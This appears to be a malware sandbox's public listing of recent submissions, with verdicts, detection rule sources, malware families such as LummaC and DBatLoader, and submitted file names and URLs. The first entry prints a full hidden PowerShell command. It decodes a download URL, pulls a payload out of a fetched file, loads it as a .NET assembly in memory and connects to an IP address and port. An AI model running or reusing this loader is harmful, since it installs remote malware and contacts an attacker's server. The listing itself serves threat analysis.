top title background image
Malware  Trends
flash

Detection Sample Info Download Report Classification & Info Graph
Malicious
  • Yara
  • Sigma
AV: None
no Icon
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1tTDJfVG5JR0tRcW9jQjZ6THZjdk42OFRxX0ZwZkM0R2g4VkNnc3pfaURocVUzVVhfSF9veHYzY1V5c09VTHBNJnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDg1MTQ3MGEwOTA0Zg=='; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('87.120.116.179', '1300');
2024-12-26 14:33:27 +01:00
Info
Class
Malicious
AV: 21%
no Icon
sshd.elf
2024-12-26 14:32:04 +01:00
Info
Malicious
AV: None
https://www.gglusa.us/
2024-12-26 14:24:05 +01:00
Info
Class
Clean
https://account.mypaymentvault.com/contactus
2024-12-26 14:23:44 +01:00
Info
Clean
http://my-msg.co/wow/?n=Jackie(dad)&m1
2024-12-26 14:23:34 +01:00
No classification & info
no
Graph
Clean
doc.pdf
2024-12-26 14:21:59 +01:00
Info
Malicious
  • Yara
Chione.exe
2024-12-26 14:18:08 +01:00
Info
Class
Malicious
  • Yara
  • Suricata
LummaC
AV: 58%
0zBsv1tnt4.exe
2024-12-26 14:13:14 +01:00
Info
Class
Malicious
j1gw88aHdL.exe
2024-12-26 14:13:14 +01:00
Info
Malicious
AV: 34%
mBr65h6L4w.exe
2024-12-26 14:13:10 +01:00
Info
Class
Malicious
  • Yara
  • Suricata
LummaC
AV: None
cqHMm0ykDG.exe
2024-12-26 14:13:07 +01:00
Info
Class
Malicious
AV: 39%
HrIrtCXI3s.exe
2024-12-26 14:13:07 +01:00
Info
Class
Clean
http://votedrterrycronin.com
2024-12-26 14:12:31 +01:00
Info
Malicious
  • Yara
DBatLoader
AV: 57%
JIL-_Document_No._2500015903.cmd
2024-12-26 13:51:10 +01:00
Info
Class
Malicious
  • Sigma
  • Suricata
51FZ8pgLbe.exe
2024-12-26 13:51:05 +01:00
Info
Class
Malicious
  • Sigma
  • Suricata
AV: 0%
setup.msi
2024-12-26 13:36:11 +01:00
Info
Class
Clean
General_ConfigTool_ChnEng_V5.001.0000003.1.R.20231130.exe
2024-12-26 13:34:04 +01:00
Info
Malicious
  • Sigma
  • Suricata
AV: 0%
installer.msi
2024-12-26 13:24:12 +01:00
Info
Class
Malicious
  • Sigma
  • Suricata
AV: 0%
setup.msi
2024-12-26 13:20:16 +01:00
Info
Class
Incomplete analysis
AV: None
http://epicunitscan.info
2024-12-26 13:18:42 +01:00
Info
Windows: InjectsWrites Registry keysDrops PE FilesHas more than one ProcessHas Email attachmentDisassembly is available
Android: Receives SMS Sends SMS Reboot Native CMD
Common: Generates Internet Traffic Generates HTTP Network Traffic Expired Sample Creates malicious files Contains malware configuration(s)
Customization Show ID column